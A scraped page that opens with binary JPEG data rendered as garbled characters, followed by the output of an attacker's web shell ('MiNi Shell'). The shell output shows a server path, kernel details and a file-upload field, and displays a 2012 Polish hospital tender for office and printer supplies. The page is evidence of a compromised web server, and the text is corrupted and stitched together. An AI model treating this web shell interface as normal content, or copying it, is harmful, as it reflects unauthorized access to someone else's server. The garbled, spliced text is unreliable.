JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/168502-N-2012.html

<p class="kh_header"><b>Siemianowice Śląskie: Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich dostaw materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek</b><br>
<b>Numer ogłoszenia: 168502 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Siemianowicach Śląskich , ul. 1-go Maja 9, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 032 2281930, faks 032 2281498.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsiemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie dla potrzeb Szpitala Miejskiego w Siemianowicach Śląskich dostaw materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 33.12.51.00-2, 30.12.51.10-5, 30.12.55.12-0, 30.19.70.00-6, 30.23.43.00-1, 30.23.44.00-2, 30.23.70.00-9, 30.19.76.42-8, 30.19.93.30-2, 30.19.76.42-8, 30.19.93.30-2, 30.19.76.44-2, 30.19.76.20-8, 30.19.97.20-3, 30.19.94.10-7, 30.19.76.30-1, 30.19.72.20-4, 30.19.92.30-1, 30.19.92.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie 
w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uważany za spełniony jeżeli Wykonawca zrealizował co najmniej trzy dostawy o wartości min. 9 000,00 zł brutto każda, których przedmiotem były dostawy materiałów biurowych, materiałów eksploatacyjnych do komputerów i kserokopiarek. Na potwierdzenie spełnienia warunku Wykonawca dołączy wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem 
nr 3 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie uważany za spełniony, jeżeli Wykonawca potwierdzi jego spełnienie w oświadczeniu zgodnie z załącznikiem nr 3 do niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>b)	prawidłowo wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;
c)	zaakceptowane i podpisane warunki projektu umowy - załącznik nr 4 do SIWZ;
d)	oświadczenie o zapoznaniu się z warunkami postępowania  - załącznik nr 5 do SIWZ;
e)	wypełniony formularz cenowy - załącznik nr 7 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Dostawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą: 
1.	zmiany ilości zamawianego asortymentu przy zachowaniu cen jednostkowych zgodnych z ofertą Dostawcy,
2.	obniżenia cen w stosunku do cen ofertowych przez Dostawcę, 
3.	zmiany numeru katalogowego produktu lub jego nazwy przy zachowaniu tożsamości dostarczanego produktu i jego cech jakościowych nie gorszych niż produkt zaoferowany w ofercie,
4.	zmiany danych Stron umowy (np. zmiana siedziby, adresu, nazwy),
5.	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
6.	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
7.	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
8.	omyłek pisarskich lub błędów rachunkowych,
9.	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między Stronami,
10.	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsiemianowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpitalu Miejskim w Siemianowicach Śląskich
ul. 1-go Maja 9; 41-100 Siemianowice Śląskie
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2012 godzina 09:30, miejsce: Szpitalu Miejskim w Siemianowicach Śląskich
ul. 1-go Maja 9; 41-100 Siemianowice Śląskie
Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1 - Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Spinacze biurowe małe
2.		Spinacze biurowe duże
3.		Zszywki
4.		Teczka plastikowa do wpinania
5.		Skoroszyt plastikowy oczko
6.		Segregator A4 7 cm kolorowe (czerwony, niebieski, czarny, zielony)
7.		Segregator A4 7 cm kolorowe (fioletowy, żółty)
8.		Segregator A4 5 cm kolorowe (czerwony, niebieski, czarny, zielony)
9.		Segregator A4 5 cm kolorowe (fioletowy, żółty)
10.		Segregator A5 5 cm kolorowe
11.		Mazaki (czarny, zielony, niebieski, czerwony)
12.		Marker biały (RTG)
13.		Markery do tablicy (ścieralne)
14.		Markery kolorowe wodoodporne
15.		Marker permanentny do opisywania płyt CD/DVD biały końcówką okrągłą 1 mm
16.		Marker permanentny do opisywania płyt CD/DVD czarny końcówką okrągłą 1 mm
17.		Linijka 25 cm
18.		Gumka ołówkowa
19.		Ołówek zwykły
20.		Długopisy zwykłe
21.		Koszulka z folii A4 (grubość folii minimum 55 mikronów)
22.		Koszulka z folii A5 (grubość folii minimum 55 mikronów)
23.		Obwoluta (twarda) - koperta z folii
24.		Klej biurowy w tubce
25.		Korektor w płynie z pędzelkiem
26.		Korektor w taśmie typu Pelikan
27.		Taśma klejąca bezbarwna szer. Od 1,8 cm do 2,5 cm
28.		Taśma pakowa bezbarwna
29.		Tusz do stempli automatycznych czarny
30.		Zszywacz
31.		Dziurkacz na co najmniej 10 kartek
32.		Folie do laminowania A 4 ( minimum 2x100 mic)
33.		Folie do laminowania A 5 (minimum 2x100 mic)
34.		Folie do laminowania A 7 (minimum 2x100 mic)
35.		Folia do bindowania
36.		Grzbiety plastikowe do bindowania
37.		Karton do bindowania
38.		Zakreślacze
39.		Pudła archiwizacyjne szer. 10 cm
40.		Pudła archiwizacyjne szer. 15 cm
41.		Pudła archiwizacyjne szer. 20 cm
42.		Pudła archiwizacyjne szer. 25 cm
43.		Sticksy 5 x 5 cm
44.		Sticksy 2x 5 cm
45.		Sticksy 7,5 x 7,5cm
46.		Cienkopisy kolorowy
47.		Taśma klejąca dwustronna
48.		Nożyczki biurowe
49.		Szufladka na dokumenty wysokość grzbietu 6 cm
50.		Kalka
51.		Identyfikator plastikowy na agrafkę
52.		Pojemnik tekturowy na czasopisma A4
53.		Teczka kopertowa ma zatrzask A4
54.		Teczka do podpisu 15 kartek
55.		Teczka do podpisu 20 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.72.20-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> artykuły papiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier ksero A4 - POLUX
2	Papier ksero A3 - POLUX
3	Papier do drukarek 240 x 2
4	Papier fax 210 mm - 30 m
5	Koperta listowa C6
6	Koperty białe B5 z klejem
7	Koperty szare B5 z klejem
8	Koperty białe B4 z klejem
9	Koperty szare B4 z klejem
10	Koperty RTG 37 x 37
11	Koperty RTG 45 x 37
12	Koperta RTG 20 x 25
13	Koperta RTG 25 x 32
14	Zeszyt A4 60 kartek (szyty) w miękkiej okładce
15	Zeszyt A5 60 kartek (szyty) w miękkiej okładce
16	Zeszyt A4 60 kartek (szyty) w twardej okładce
17	Zeszyt A5 60 kartek (szyty) w twardej okładce
18	Teczka do wiązania A4
19	Teczka do wiązania A3
20	Teczka z gumką
21	Teczka do zawieszania 
22	Koperty papierowe na CD/DVD-R z okienkiem foliowym przeźroczystym
23	Taśma do metkownicy - 1 rzędowe białe
24	Taśma do metkownicy - 3 rzędowe białe
25	Etykiety samoprzylepne 
np. EMERSON (lub równoważne, co do trwałości, jakości i parametrów1)
Format A4 (297 x 2010)
Ilość w opakowaniu 100 etykiet
Fotomat etykiety 97 x 42,3 - 2 op; 
70 x 35 - 2 op.  z naciętym podkładem do wydruku na drukarkach laserowych, atramentowych i ksero.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.42-8, 30.19.93.30-2, 30.19.76.44-2, 30.19.76.20-8, 30.19.97.20-3, 30.19.94.10-7, 30.19.76.30-1, 30.19.92.30-1, 30.19.92.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materiały eksploatacyjne do komputerów i kserokopiarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Taśma do drukarek OKI ML 3320/3321
(kod producenta OKI 09002303)
2	Taśma do drukarek OKI ML 3390
(kod producenta OKI 09002309)
3	Taśma do drukarek OKI ML 3410
(kod producenta OKI 09002308)
4	Taśma do drukarki Panasonic KX-P2130
(kod producenta Panasonic KX-P160)
5	Taśma do drukarki Epson LX-300t
8	Tusz do drukarek HP typ HP15 (C6615NE)
9	Tusz do drukarek HP typ HP27 (C8727AE)
10	Tusz do drukarek HP typ HP54 (CB334AE)
11	Tusz do drukarek HP typ HP57 (C6657AE)
12	Tusz do drukarek HP typ HP338 (C8765EE)
13	Tusz do drukarek HP typ HP343 (C8766EE)
14	Toner do drukarek HP LJ 1010,1018,1020 typ 12A (Q2612A)
15	Toner do drukarek HP LJ 1100 typ 92A (C4092A)
16	Toner do drukarek HP LJ 1200 typ 15A (C7115A)
17	Toner do drukarek HP LJ P1005 typ 35A (CB435A)
18	Toner do drukarek HP LJ P2055DN typ HP CE505X 
19	Toner do drukarek HP LJ M1522nf typ HP CB436A 
20	Toner do drukarek HP CLJ CM2320fxi typ HP CC530A
21	Toner do drukarek HP CLJ CM2320fxi typ HP CC531A
22	Toner do drukarek HP CLJ CM2320fxi typ HP CC532A
23	Toner do drukarek HP CLJ CM2320fxi typ HP CC533A
24	Toner do drukarki HP LJ 4250DN typ HP Q5942A
25	Toner do drukarki HP LJ 8000DN typ HP C3909A
26	Toner do drukarek OKI B430DN typ OKI 43979202
27	Toner do Ksero Canon ir2270 typ C-EXV11 (CF9629A002AA)
28	Toner do Ksero Canon ir1600 typ C-EXV5 (CF6836A002AA)
29	Toner do Ksero Canon GP-225 typ GP-210/215/225
30	Toner do Ksero Konica Minolta BizHub 160 typ TN-113
31		Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-123
32	Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-124
33	Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-125
34	Toner do Ksero Minolta CF9001 typ Konica Minolta 8937-126
35	Bęben do Drukarki OKI B430DN typ OKI 43979002
36	Bęben do Ksero Canon ir2270 typ Canon IR2270-4570
37	Bęben do Ksero Canon ir1600 typ Canon CF6837A003AA
38	Bęben do Ksero Canon GP-225 typ Canon GP 210/ 215/225
39	Bęben do Ksero Minolta CF9001 typ Konica Minolta 1179-0297-01
40	Taśma do maszyn 13 mm
41	Fuser Oil do Ksero Minolta CF9001 typ Konica Minolta 9966-242.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Recepty RUM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Recepta RUM biała składanka (1+1) do stosowania w drukarkach igłowych
2	Recepta RUM biała do stosowania w drukarkach laserowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.42-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nośniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płyty CD - R 
VERBATIM kod 43432 lub równoważne, co do trwałości, jakości i parametrów
2	Płyty DVD - R 
VERBATIM kod 43522 lub równoważne, co do trwałości, jakości i parametrów
3	Płyty DVD + R 
VERBATIM kod 43500 lub równoważne, co do trwałości, jakości i parametrów
4	DYSKIETKI
VERBATIM kod 87410 lub równoważne, co do trwałości, jakości i parametrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.23.44.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Artykuły czyszczące do komputerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sprężone powietrze
2	Antystatyczna pianka do czyszczenia obudowy komputera, drukarek, klawiatury
3	Antystatyczna pianka do czyszczenia wyświetlaczy ciekłokrystalicznych
4	Alkohol izopropylowy
5	Chusteczki czyszczące przeznaczone do pielęgnacji monitorów LCD i TFT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com